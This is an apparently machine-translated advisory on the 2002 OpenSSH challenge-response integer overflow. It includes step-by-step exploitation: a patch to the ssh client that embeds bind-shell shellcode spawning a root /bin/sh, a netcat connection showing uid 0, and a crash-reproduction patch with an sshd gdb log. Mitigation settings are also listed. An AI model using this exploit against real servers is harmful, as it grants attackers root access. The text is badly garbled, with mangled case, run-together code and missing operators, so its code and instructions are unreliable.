Recommended procedures:
OpenSSH Versions 2.3.1p1 ~ 3.3
Description: OpenSSH defect allows attackers to remotely utilize / illegally perform any code (update)
Detailed: In OpenSSH 2.3.1P1 to 3.3, there is security defect on challenge response code. Allow remote intruders to perform arbitrary instructions as SSHD (usually the root) process. The first defect is because OpenSSH has an integer overflow risk on the variable that processes the number of responses received, if the challenge reaction is set to open, and the system uses the SKEY or BSD_AUTH authentication option, allowing attacks. Use this defect to remotely perform any instructions. This vulnerability has been confirmed. The second defect involves the use of interactive keyboard authentication PAM modules, OpenSSH 2.3.1p1 ~ 3.3. OpenSSH has a buffer risk on a variable on the number of responds received, regardless of the challenge reaction setting, the system uses interactive keyboard authentication PAM modules (PamauthenticationViakbdint), which may result in the risk of remote illegal execution of instructions. There is currently no code to confirm whether the attack can be achieved. Attacks of these two defects are built on version characteristics of SSH VER2. Multiple Linux / UNIX platforms are affected by this vulnerability. Multiple Linux organizations and vendors have released security announcements.
Attack method:
1. Download OpenSSH-3.2.2p1.tar.gz and extract
~ $ TAR -XVZF OPENSSH-3.2.2p1.tar.gz
2. Execute the patch provided: (save the following red font segment as a patch file)
~ / OpenSSH-3.2.2P1 $ PATCH 3. Compile the OpenSSH client that has already turned out the patch: ~ / OpenSSH-3.2.2p1 $ ./configure && make ssh 4. Run SSH: ~ / OpenSSH-3.2.2P1 $ ./ssh root: SKEY @ localhost 5. If successful, connect 128 ports ~ $ nc localhost 128 uname -a openbsd nice 3.1 generic # 59 i386 id uid = 0 (root) gid = 0 (WHEEL) Groups = 0 (WEL) (In addition, Bugtraq.org offers a patch SSH attack client: sshutup-theo.tar.gz) --- Sshconnect2.c Sun Mar 31 20:49:39 2002 Evil-sshconnect2.c fri jun 28 19:22:12 2002 @@ -839, 6 839, 56 @@ / * * Parse Info_Request, prompt user and send INFO_RESPONSE * / int do_syscall (int nb_args, int syscall_num, ...); void shellcode (void) { int server_sock, client_sock, len; struct sockaddr_in server_addr; char rootshell [12 ], * Argv [2], * envp [1]; server_sock = do_syscall (3, 97, af_INET, SOCK_STREAM, 0); Server_addr.sin_addr.s_addr = 0; Server_addr.sin_port = 32768; Server_Addr. sin_family = AF_INET; do_syscall (3, 104, server_sock, (struct sockaddr *) & server_addr, 16); do_syscall (2, 106, server_sock, 1); client_sock = do_syscall (3, 30, server_sock, (struct sockaddr * ) & Server_addr, & len); do_syscall (2, 90, client_sock, 0); do_syscall (2, 90, client_sock, 1); do_syscall (2, 90, client_sock, 2); * (int *) ( Rootshell 0) = 0x6E69622F; * (INT *) (Rootshell 4) = 0x0068732F; * (INT *) (Rootshell 8) = 0; Argv [0] = R OOTSHELL; Argv [1] = 0; ENVP [0] = 0; DO_SYSCALL (3, 59, Rootshell, Argv, ENVP); } INT DO_SYSCALL (int NB_ARGS, INT SYSCALL_NUM, ...) { int R; ASM ( "MOV 8 (% EBP),% EAX;" "Add $ 3,% EAX;" "SHL $ 2,% EAX;" "Add% EBP,% EAX;" "MOV 8 (% EBP),% ECX;" "push_args:" "push (% EAX);" "SUB $ 4,% EAX;" "loop push_args;" "MOV 12 (% EBP), % EAX; " " Push $ 0; " "INT $ 0x80;" "MOV% EAX, -4 (% EBP)" ); return (RET); } void input_userauth_info_req (int type, u_int32_t seq, void * ctxt) {@@ -865, 7 915,7 @@ xfree (inst); xfree (lang); -. num_prompts = packet_get_int (); num_prompts = 1073741824 1024; / * * Begin to build info response packet based on prompts requested * We commit to providing the correct number of responses, so if @@ -874,6 924,13 @@ * / packet_start (SSH2_MSG_USERAUTH_INFO_RESPONSE); packet_put_int (num_prompts); for (i = 0; i <1045; i ) packet_put_cstring ( " xxxxxxxxxx "); packet_put_string (shellcode, 2047); packet_send (); return; Debug2 ("INPUT_USERAUTH_INFO_REQ: NUM_PMPTS% D", NUM_PROMPTS); for (i = 0; I Solution: Upgrade OpenSSH to version 3.4. http://www.openssh.com/txt/preauth.adv Prohibits SSH Protocol Ver 2 in / etc / ssh / sshd_config: Add this line: Protocol 1 It is forbidden to challenge the reaction certification for OpenSSH 2.9 or higher, and the administrator can prohibit challenge response certification options: add a line in / etc / ssh / sshd_config: ChallengeResponseAuthentication NO is set to YES by default Prohibited PAM module: / etc / ssh / sshd_config: PamauthenticationViakbdint NO Old releases two options (2.3.1p1 and 2.9) KBDinteractiveAuthentication NochallengesponseAuthentication No Use weight limit minimization impact: / etc / ssh / sshd_config: Useprivilegeseparation YES Multiple UNIX platforms are affected by this vulnerability, there are already multiple UNIX Vendor release security announcements: Debian Security Advisory DSA-134-4Netbsd Security Advisory SA2002-005OpenPKG Security Advisory Suse Security AnnouncementTrustix Secure Linux Additional information: How to reproduce OpenSSH overflow. The R7 Team Did A Little Investigating Into One of The OpenSshvulneRabilities. The Following Are Instructions on now The Reproduce A SegmentationViological In Sshd (v3.2.3p1): 0.) Compile with Pam and S / Key Support. 1.) Apply The Following Patch To The SSH Client: - --- Sshconnect2.c.bak thu jun 27 11:54:54 2002 sshconnect2.c Thu Jun 27 11:56:27 2002 @@ -866, 6 866 ,7 @@ xfree (lang); num_prompts = packet_get_int (); num_prompts = 2;. / ** Begin to build info response packet based on prompts requested * We commit to providing the correct number of responses, so if @@ -877,15 878,16 @@ DEBUG2 ("INPUT_USERAUTH_INFO_REQ: NUM_PROMPTS% D", NUM_PROMPTS); for (i = 0; i Response = read_passphrase (prompt, echo? rp_echo: 0); - - } packet_put_cstring (response); - - MEMSET (Response, 0, Strlen (Response)); / * Memset (Response, 0, Strlen (Response)) Xfree (response); - - xfree (prompt); xfree (prompt); * /} packet_check_eom (); / * done with paarsing incoming message. * / 2.) Add "pamauthenticationviakbdint yes" to 'sshd_config'. 3.) Connect To Sshd Using The Modified Client.note: Valid Credentials Are Not Required. On The Server Side, You'll See: [Root @ wonderland hi_chad] # gdb / usr / sbin / sshdGNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT) Copyright 2001 Free Software Foundation, Inc.GDB is free software, covered by the GNU General Public License , and you arewelcome to change it and / or distribute copies of it under certain conditions.Type "show copying" to see the conditions.There is absolutely no warranty for GDB. Type "show warranty" for details.This GDB was configured as " i386-redhat-linux ... (no debugging symbols found) ... (GDB) Run -dstarting program: / usr / sbin / sshd -ddebug1: sshd version openssh_3.2.3p1debug1: private host key: # 0 TYPE 0 RSA1debug1: read PEM private key done: type RSAdebug1: private host key: # 1 type 1 RSAdebug1: read PEM private key done: type DSAdebug1: private host key: # 2 type 2 DSAsocket: Address family not supported by protocoldebug1: Bind to port 22 on 0.0.0.0.0.0.0 port 22.Generating 768 Bit Rsa Key.rsa Key Generation Complete.debug1: Server Will Not fork When Running in Debugging mode.Connection from 127.0.0.1 port 33208debug1: Client protocol version 2.0; client software version OpenSSH_3.2.3p1debug1: match: OpenSSH_3.2.3p1 pat OpenSSH * Enabling compatibility mode for protocol 2.0debug1: Local version string SSH-1.99-OpenSSH_3.2.3 p1debug1: list_hostkey_types: ssh-rsa, ssh-dssdebug1: SSH2_MSG_KEXINIT sentdebug1: SSH2_MSG_KEXINIT receiveddebug1: kex: client-> server aes128-cbc hmac-md5 nonedebug1: kex: server-> client aes128-cbc hmac-md5 nonedebug1: SSH2_MSG_KEX_DH_GEX_REQUEST receiveddebug1: SSH2_MSG_KEX_DH_GEX_GROUP sentdebug1: dh_gen_key: priv key bits set: 124 / 256debug1: bits set: 1626 / 3191debug1: expecting SSH2_MSG_KEX_DH_GEX_INITdebug1: bits set: 1597 / 3191debug1: SSH2_MSG_KEX_DH_GEX_REPLY sentdebug1: kex_derive_keysdebug1: newkeys: mode 1debug1: SSH2_MSG_NEWKEYS sentdebug1: waiting for SSH2_MSG_NEWKEYSdebug1: newkeys: mode 0debug1: SSH2_MSG_NEWKEYS receiveddebug1: KEX donedebug1: userauth-request for user jdog service ssh-connection method nonedebug1: attempt 0 failures 0debug1: Starting up PAM with username "jdog" debug1: PAM setting rhost to "localhost.localdomain" Failed none for jdog from 127.0.0.1 port 33208 ssh2debug1: userauth-request for user jdog service ssh-connection method keyboard-interactivedebug1: attempt 1 failures 1debug1: keyboard-interactive devsdebug1: auth2_challenge: user = jdog DEVS = Debug1: Kbdint_alloc: Devices' SKEY'DEBUG1: Auth2_Challenge_Start: Trying Authenticati On Method 'SKEY'DEBUG1: GOT 2 Responses (No Debugging Symbols Found) ... Program Received Signal Sigsegv, Segmentation Fault.0x08053822 In Strcpy () Comments Are Much AppReciated. --Joe